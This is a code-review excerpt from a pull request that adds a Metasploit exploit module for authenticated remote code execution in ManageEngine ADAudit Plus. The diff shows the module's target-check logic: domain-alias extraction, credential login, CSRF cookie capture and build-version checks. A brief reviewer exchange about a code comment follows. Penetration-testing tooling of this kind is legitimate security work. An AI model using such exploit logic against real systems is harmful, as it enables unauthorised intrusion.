modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb

```diff
@@ -0,0 +1,595 @@
+    # we can try to extract the FQDN for a configured domain from the server response
+    domain_alias_results = adaudit_plus_grab_domain_aliases(target_check_res)
+    domain_alias_msg = domain_alias_results['message']
+    if domain_alias_results['status'] == adaudit_plus_status::NO_DOMAINS
+      return CheckCode::Safe(domain_alias_msg)
+    end
+
+    domain_aliases = domain_alias_results['domain_aliases']
+    # if the only configured domain is the default domain, we will not be able to trigger the payload, so there is no point to proceed
+    if domain_aliases == ['ADAuditPlus Authentication']
+      return CheckCode::Safe('No Active Directory domains are configured on the target, so the module will not be able to trigger the payload.')
+    end
+
+    # set the domain alias to the first configured domain, unless the user provided an invalid domain
+    # in the latter case, the module won't be able to authenticate to the target so there's no point to proceed
+    if auth_domain == 'ADAuditPlus Authentication' || domain_aliases&.include?(auth_domain)
+      vprint_status(domain_alias_msg)
+      @domain_alias = domain_aliases.first
+      print_status("Using configured authentication domain alias #{@domain_alias}.")
+    else
+      # this means the user provided an authentication domain that isn't actually configured on the target, so authentication cannot succeed
+      print_status(domain_alias_msg)
+      return CheckCode::Detected("The provided AUTH_DOMAIN #{auth_domain} does not match the configured authentication domain(s).")
+    end
+
+    print_status("Attempting to authenticate to #{auth_domain} with username: #{username} and password: #{password}")
+    login_results = adaudit_plus_login(auth_domain, username, password, false)
+    login_msg = login_results['message']
+    case login_results['status']
+    when adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY
+      return CheckCode::Unknown(login_msg)
+    when adaudit_plus_status::NO_ACCESS, NO_DOMAINS
+      # if we cannot authenticate, we can't create an alert profile so exploitation is impossible
+      # if no domains are configured, we cannot trigger the payload and therefore exploitation is impossible
+      return CheckCode::Safe(login_msg)
+    when adaudit_plus_status::SUCCESS
+      @domain = login_results['configured_domains'].first
+      vprint_status("Using domain #{@domain} for the name of the directory we will be creating")
+    end
+
+    print_good('Successfully authenticated')
+    @adapcsrf_cookie = login_results['adapcsrf_cookie']
+
+    # check the build version to see if we can actually exploit the target
+    build_results = adaudit_plus_grab_build(@adapcsrf_cookie)
+    build_msg = build_results['message']
+    unless build_results['status'] == adaudit_plus_status::SUCCESS
+      # this covers: adaudit_plus_status::CONNECTION_FAILED, adaudit_plus_status::UNEXPECTED_REPLY and adaudit_plus_status::NO_BUILD_NUMBER
```

Comment:
Probably best not to tie this in to specific items since these may change over time.

Reply:
Wdym? Would you prefer not to include the comment mentioning the specific status codes?

Reply:
gotcha, fixed this now